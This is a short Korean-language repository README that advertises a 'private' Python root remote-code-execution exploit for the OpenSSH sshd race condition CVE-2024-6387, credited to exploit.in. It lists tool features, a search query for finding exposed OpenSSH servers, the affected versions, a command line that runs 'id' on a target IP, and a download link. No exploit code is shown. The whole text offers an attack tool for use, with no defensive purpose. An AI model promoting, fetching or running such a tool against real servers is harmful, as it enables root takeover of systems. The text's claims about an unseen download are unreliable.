
exploit.in의 CVE-2024-6387용 비공개 x64 RCE 익스플로잇 [02.07.2024]
CVE-2024-6387용 비공개 x64 RCE 익스플로잇(Python) [02.07.2024] - exploit.in 제공
이 저장소는 실시간 활성 셸, 멀티스레딩, 파일에서 대상 입력, 컬러 출력을 지원하는 CVE-2024-6387 취약점 익스플로잇의 작동 변형을 제공합니다.
CVE-2024-6387용 익스플로잇으로, glibc 기반 Linux 시스템에서 OpenSSH 서버(sshd)의 시그널 핸들러 레이스 컨디션을 대상으로 합니다. 이 취약점은 SIGALRM 핸들러에서 async-signal-unsafe 함수가 호출되어 루트 권한으로 원격 코드 실행이 가능하게 합니다.
이 익스플로잇은 async-signal-unsafe 함수를 호출하는 OpenSSH sshd의 SIGALRM 핸들러 레이스 컨디션을 대상으로 합니다. 이를 이용하여 루트 권한으로 원격 코드 실행을 달성할 수 있습니다.
app:"OpenSSH"
OpenSSH 8.5p1 ~ 9.8p1
익스플로잇을 실행하려면 Python 3.9가 필요합니다. 실행:
python exploit.py -h 10.10.10.10 -c 'id'
여기서 다운로드 (안전하게!)